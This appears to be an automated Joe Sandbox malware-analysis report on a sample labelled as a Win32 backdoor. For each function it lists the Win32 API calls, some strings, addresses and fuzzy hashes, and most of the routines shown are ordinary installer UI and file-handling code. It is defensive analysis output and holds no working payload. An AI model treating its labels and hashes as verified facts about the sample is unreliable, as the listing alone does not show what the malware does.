Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 678dda1956c76501b884b31d864f32cfb9dffbcc261a7e54856ad0407b5978bb
Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
Opcode Fuzzy Hash: 678dda1956c76501b884b31d864f32cfb9dffbcc261a7e54856ad0407b5978bb
Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403F77 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
ShowWindow.USER32(?), ref: 00403FD3
GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
ShowWindow.USER32(?,00000004), ref: 00403FFE
DestroyWindow.USER32 ref: 00404012
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
GetDlgItem.USER32(?,?), ref: 0040404A
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
IsWindowEnabled.USER32(00000000), ref: 00404065
GetDlgItem.USER32(?,00000001), ref: 00404110
GetDlgItem.USER32(?,00000002), ref: 0040411A
SetClassLongW.USER32(?,000000F2,?), ref: 00404134
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
GetDlgItem.USER32(?,00000003), ref: 0040422B
ShowWindow.USER32(00000000,?), ref: 0040424C
EnableWindow.USER32(?,?), ref: 0040425E
EnableWindow.USER32(?,?), ref: 00404279
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
EnableMenuItem.USER32(00000000), ref: 00404296
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
ShowWindow.USER32(?,0000000A), ref: 00404433

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: 6d11154a05db4576e87e051277fe7e4c000e330e65fc392688a6db0da7409f81
Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
Opcode Fuzzy Hash: 6d11154a05db4576e87e051277fe7e4c000e330e65fc392688a6db0da7409f81
Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404635 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
GetDlgItem.USER32(?,000003E8), ref: 004046E7
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
GetSysColor.USER32(?), ref: 00404715
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
lstrlenW.KERNEL32(?), ref: 00404736
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
GetDlgItem.USER32(?,0000040A), ref: 004047B1
SendMessageW.USER32(00000000), ref: 004047B8
GetDlgItem.USER32(?,000003E8), ref: 004047E3
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
LoadCursorW.USER32(00000000,00007F02), ref: 00404834
SetCursor.USER32(00000000), ref: 00404837
LoadCursorW.USER32(00000000,00007F00), ref: 00404850
SetCursor.USER32(00000000), ref: 00404853
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894

Strings

open cmd, xrefs: 00404812
N, xrefs: 004047D1

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$open cmd
API String ID: 3103080414-1465111519
Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406160 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061A4

Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1

GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 004061C1
wsprintfA.USER32 ref: 004061DF
GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
GlobalFree.KERNEL32(00000000), ref: 004062C8
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062CF

Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030

Strings

%ls=%ls, xrefs: 004061D5
Uz, xrefs: 00406189
[Rename], xrefs: 00406249, 0040625B
]z, xrefs: 004061B6
]z, xrefs: 004061BD

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Uz$]z$]z
API String ID: 2171350718-2304911260
Opcode ID: 2d35bf13d1375d3c6da66062a6a01f46b6474b78dcc5aa161486fb580ec27b69
Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
Opcode Fuzzy Hash: 2d35bf13d1375d3c6da66062a6a01f46b6474b78dcc5aa161486fb580ec27b69
Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004044DD Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044FA
GetSysColor.USER32(00000000), ref: 00404538
SetTextColor.GDI32(?,00000000), ref: 00404544
SetBkMode.GDI32(?,?), ref: 00404550
GetSysColor.USER32(?), ref: 00404563
SetBkColor.GDI32(?,?), ref: 00404573
DeleteObject.GDI32(?), ref: 0040458D
CreateBrushIndirect.GDI32(?), ref: 00404597

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 307f0adb03de418db05ce456a6e98ecd908ab5abab62206e0655cd74099b0a55
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 702197B1501708BFD7309F28DD08B5BBBF8AF80714B00852EEA92A22E1D738D914CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060EB: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406101

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
Instruction ID: be08228a48e351455db253d3f5410474da148bca98ac48c4339161726040cff4
Opcode Fuzzy Hash: 588ede5e84484d8860c92fb66ffae47e610f47b9ca95ac382e9d1b4b4742ae18
Instruction Fuzzy Hash: 89510A75D00219AADF20EFD5CA88AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040557C Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079DF00,771B23A0,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

Part of subcall function 00406557: lstrcatW.KERNEL32(open cmd,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
Part of subcall function 00406557: lstrlenW.KERNEL32(open cmd,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: d182a1d70429bc64db553ecc4079719f7a86ed9d7a4d9c7a567f665e8b6c1191
Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
Opcode Fuzzy Hash: d182a1d70429bc64db553ecc4079719f7a86ed9d7a4d9c7a567f665e8b6c1191
Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004067A1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406804
CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406813
CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00406818
CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,?,004034E5,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 0040682B

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004067A2
*?|<>/":, xrefs: 004067F3

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
API String ID: 589700163-1439852002
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E31 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
GetMessagePos.USER32 ref: 00404E54
ScreenToClient.USER32(?,?), ref: 00404E6E
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6

Strings

f, xrefs: 00404E82

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(0000EA00,00000064,00A07450), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
